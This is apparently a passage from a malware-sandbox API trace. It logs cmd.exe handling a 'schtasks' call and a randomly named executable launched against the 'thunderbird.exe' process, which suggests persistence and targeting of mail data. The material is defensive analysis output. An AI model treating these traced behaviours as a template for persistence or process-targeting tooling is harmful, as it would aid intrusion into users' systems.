returned 1 [0211.986] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0211.986] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f384 | out: lpFindFileData=0x24f384*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x582338 [0211.986] FindClose (in: hFindFile=0x582338 | out: hFindFile=0x582338) returned 1 [0211.986] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0211.986] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0211.986] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0211.986] GetProcessHeap () returned 0x570000 [0211.986] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x582c60 | out: hHeap=0x570000) returned 1 [0211.986] GetEnvironmentStringsW () returned 0x582b78* [0211.987] GetProcessHeap () returned 0x570000 [0211.987] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x5842e0 [0211.987] FreeEnvironmentStringsW (penv=0x582b78) returned 1 [0211.987] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0211.987] GetProcessHeap () returned 0x570000 [0211.987] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5817f0 | out: hHeap=0x570000) returned 1 [0211.987] GetProcessHeap () returned 0x570000 [0211.987] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400e) returned 0x584e20 [0211.988] GetProcessHeap () returned 0x570000 [0211.988] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x42) returned 0x5817f0 [0211.988] GetProcessHeap () returned 0x570000 [0211.988] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584e20 | out: hHeap=0x570000) returned 1 [0211.988] GetConsoleOutputCP () returned 0x1b5 [0211.988] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0211.988] GetUserDefaultLCID () returned 0x409 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f748, cchData=128 | out: lpLCData="0") returned 2 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f748, cchData=128 | out: lpLCData="0") returned 2 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f748, cchData=128 | out: lpLCData="1") returned 2 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0211.989] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0211.990] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0211.991] GetProcessHeap () returned 0x570000 [0211.991] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x20c) returned 0x582b78 [0211.991] GetConsoleTitleW (in: lpConsoleTitle=0x582b78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0211.991] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0211.991] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0211.992] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0211.992] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0211.993] GetProcessHeap () returned 0x570000 [0211.993] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x400a) returned 0x584e20 [0211.993] GetProcessHeap () returned 0x570000 [0211.993] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x584e20 | out: hHeap=0x570000) returned 1 [0211.994] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0211.994] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0211.994] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0211.994] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0211.994] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0211.994] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0211.994] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0211.994] GetProcessHeap () returned 0x570000 [0211.994] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x58) returned 0x582d90 [0211.994] GetProcessHeap () returned 0x570000 [0211.994] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x5823b8 [0211.995] GetProcessHeap () returned 0x570000 [0211.995] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x582df0 [0211.996] GetConsoleTitleW (in: lpConsoleTitle=0x24f440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0211.997] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0211.997] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0211.998] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0211.998] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0211.998] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0211.998] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0211.998] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0211.998] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0211.998] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0211.998] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0211.998] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0211.998] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0211.998] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0211.998] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0211.998] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0211.998] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0211.998] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0211.998] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0211.998] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0211.998] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0211.998] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0211.998] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0211.998] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0211.998] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0211.998] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0211.998] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0211.998] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0211.998] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0211.998] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0211.999] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0211.999] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0211.999] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0211.999] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0211.999] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0211.999] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0211.999] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0211.999] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0211.999] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0211.999] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0211.999] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0211.999] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0211.999] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0211.999] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0211.999] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0211.999] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0211.999] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0212.000] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0212.000] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0212.000] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0212.000] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0212.000] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0212.000] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0212.000] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0212.000] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0212.000] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0212.000] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0212.000] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0212.000] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0212.000] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0212.000] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0212.000] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0212.000] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0212.000] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0212.000] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0212.000] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0212.000] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0212.000] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0212.001] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0212.001] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0212.001] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0212.001] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0212.001] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0212.001] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0212.001] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0212.001] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0212.001] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0212.001] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0212.001] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0212.001] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0212.001] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0212.001] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0212.001] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0212.001] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0212.001] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0212.001] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0212.001] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0212.002] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0212.003] GetProcessHeap () returned 0x570000 [0212.003] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x210) returned 0x582e28 [0212.003] GetProcessHeap () returned 0x570000 [0212.003] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x40) returned 0x583040 [0212.003] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0212.004] GetProcessHeap () returned 0x570000 [0212.004] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x418) returned 0x583088 [0212.004] SetErrorMode (uMode=0x0) returned 0x0 [0212.004] SetErrorMode (uMode=0x1) returned 0x0 [0212.004] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x583090, lpFilePart=0x24ef60 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24ef60*="Desktop") returned 0x25 [0212.005] SetErrorMode (uMode=0x0) returned 0x1 [0212.005] GetProcessHeap () returned 0x570000 [0212.005] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x583088, Size=0x66) returned 0x583088 [0212.005] GetProcessHeap () returned 0x570000 [0212.005] RtlSizeHeap (HeapHandle=0x570000, Flags=0x0, MemoryPointer=0x583088) returned 0x66 [0212.005] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.005] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0212.005] GetProcessHeap () returned 0x570000 [0212.005] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x120) returned 0x5830f8 [0212.005] GetProcessHeap () returned 0x570000 [0212.005] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x238) returned 0x583220 [0212.463] GetConsoleTitleW (in: lpConsoleTitle=0x24f1d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0212.464] InitializeProcThreadAttributeList (in: lpAttributeList=0x24f05c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24f124 | out: lpAttributeList=0x24f05c, lpSize=0x24f124) returned 1 [0212.464] UpdateProcThreadAttribute (in: lpAttributeList=0x24f05c, dwFlags=0x0, Attribute=0x60001, lpValue=0x24f11c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24f05c, lpPreviousValue=0x0) returned 1 [0212.464] GetStartupInfoW (in: lpStartupInfo=0x24f018 | out: lpStartupInfo=0x24f018*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0212.773] CloseHandle (hObject=0x74) returned 1 [0212.773] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.773] GetProcessHeap () returned 0x570000 [0212.773] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5842e0 | out: hHeap=0x570000) returned 1 [0212.774] GetEnvironmentStringsW () returned 0x5842e0* [0212.774] GetProcessHeap () returned 0x570000 [0212.774] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb36) returned 0x587260 [0212.774] FreeEnvironmentStringsW (penv=0x5842e0) returned 1 [0212.774] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0225.302] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x24eff8 | out: lpExitCode=0x24eff8*=0x0) returned 1 [0225.303] CloseHandle (hObject=0x78) returned 1 [0225.303] _vsnwprintf (in: _Buffer=0x24f140, _BufferCount=0x13, _Format="%08X", _ArgList=0x24f004 | out: _Buffer="00000000") returned 8 [0225.303] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0225.303] GetProcessHeap () returned 0x570000 [0225.303] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x587260 | out: hHeap=0x570000) returned 1 [0225.303] GetEnvironmentStringsW () returned 0x587260* [0225.303] GetProcessHeap () returned 0x570000 [0225.303] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb5c) returned 0x587dc8 [0225.303] FreeEnvironmentStringsW (penv=0x587260) returned 1 [0225.303] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0225.303] GetProcessHeap () returned 0x570000 [0225.303] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x587dc8 | out: hHeap=0x570000) returned 1 [0225.303] GetEnvironmentStringsW () returned 0x587260* [0225.303] GetProcessHeap () returned 0x570000 [0225.303] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xb5c) returned 0x587dc8 [0225.304] FreeEnvironmentStringsW (penv=0x587260) returned 1 [0225.304] GetProcessHeap () returned 0x570000 [0225.304] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57ffe8 | out: hHeap=0x570000) returned 1 [0225.304] DeleteProcThreadAttributeList (in: lpAttributeList=0x24f05c | out: lpAttributeList=0x24f05c) [0225.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.304] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.304] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.305] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0225.305] _get_osfhandle (_FileHandle=0) returned 0x3 [0225.305] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0225.305] SetConsoleInputExeNameW () returned 0x1 [0225.305] GetConsoleOutputCP () returned 0x1b5 [0225.306] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0225.306] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.306] exit (_Code=0) Process: id = "205" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1dc2d000" os_pid = "0x64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 762 os_tid = 0x72c Thread: id = 771 os_tid = 0xae4 Thread: id = 783 os_tid = 0xb54 Process: id = "206" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1b790000" os_pid = "0x8ac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "202" os_parent_pid = "0xa2c" cmd_line = "tdq963ii.exe -accepteula \"thunderbird.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 763 os_tid = 0x40c [0206.274] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0206.275] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0206.276] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0206.277] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0206.278] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0206.279] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0206.280] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0206.281] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0206.282] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0206.283] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 